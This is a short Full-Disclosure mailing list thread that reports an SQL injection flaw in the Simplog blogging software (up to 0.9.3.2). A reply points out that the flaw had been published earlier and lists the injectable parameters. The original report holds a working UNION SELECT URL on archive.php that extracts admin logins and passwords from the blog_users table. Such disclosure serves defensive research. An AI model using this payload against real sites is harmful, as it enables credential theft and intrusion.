str0ke , looks like i reinvented the wheel :-)) . i didn't make any research. a friend of mine installed the latest version of this software and voila... str0ke wrote: > Javor, > > It seems rgod found this vulnerability back in April of 2006. > > http://www.milw0rm.com/exploits/1663 > > <> > ii) > http://[target]/[path]/index.php?blogid=[sql] > http://[target]/[path]/archive.php?blogid=[sql] > http://[target]/[path]/archive.php?m=[sql] > http://[target]/[path]/archive.php?y=[sql] > > /str0ke > > On 1/1/07, Javor Ninov <drfrancky@xxxxxxxxxxx> wrote: >> Afected Software: >> simplog up to 0.9.3.2 (latest version - 12/05/2006 ) >> >> Site: >> http://www.simplog.org >> Simplog provides an easy way for users to add blogging capabilities to >> their existing websites. Simplog is written in PHP and compatible with >> multiple databases. Simplog also features an RSS/Atom aggregator/reader. >> Powerful, yet simple >> >> Vulnerability: >> SQL Injection in archive.php >> other files probably also affected >> >> Example: >> http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1 >> >> >> Vendor status: >> NOT NOTIFIED >> >> >> Javor Ninov aka DrFrancky >> drfrancky shift+2 securax.org >> http://securitydot.net/ >> >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >>
Attachment:
signature.asc
Description: OpenPGP digital signature